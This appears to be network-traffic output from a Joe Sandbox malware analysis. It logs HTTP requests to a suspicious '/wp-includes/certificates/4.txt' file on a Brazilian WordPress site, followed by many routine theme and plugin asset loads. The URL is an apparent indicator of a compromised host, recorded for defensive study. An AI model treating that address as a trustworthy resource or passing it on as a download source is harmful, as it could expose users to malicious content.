Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View IP Address: 104.18.10.207 104.18.10.207
Source: global trafficHTTP traffic detected: GET /translate_a/element.js?cb=googleTranslateElementInit2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: translate.google.com
Source: global trafficHTTP traffic detected: GET /wp-includes/certificates/4.txt HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: netdna.bootstrapcdn.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/bootstrap/css/bootstrap.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /translate_a/element.js?cb=googleTranslateElementInit2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: translate.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/bootstrap/css/responsive.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/css/camera.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/flexslider.css?ver=2.2.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.carousel.css?ver=1.24 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.theme.css?ver=1.24 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/css/parallax.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/css/banner-rotator.css?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/css/caption.css?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/lib/owl/assets/owl.carousel.min.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets//lib/owl/assets/owl.theme.default.min.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/lib/animate/animate-logo.css?ver=20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/css/logo-slider-wp-public.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/main-style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/motopress-content-editor/bootstrap/bootstrap-grid.min.css?ver=1.5.8 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/motopress-content-editor/includes/css/theme.css?ver=1.5.8 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/elasti-carousel/jquery.elastislide.js?ver=1.2.8.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/js/jquery.flashblue-plugins.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/lib/owl/owl.carousel.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/swfobject.js?ver=2.2-20120417 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/css/style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/custom.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.js HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/flags/16/pt-br.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/images/content_bg4.jpg HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquery.flexslider-min.js?ver=2.2.2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/switcher.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/arrow_down.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/custom-script.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/chart.min.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
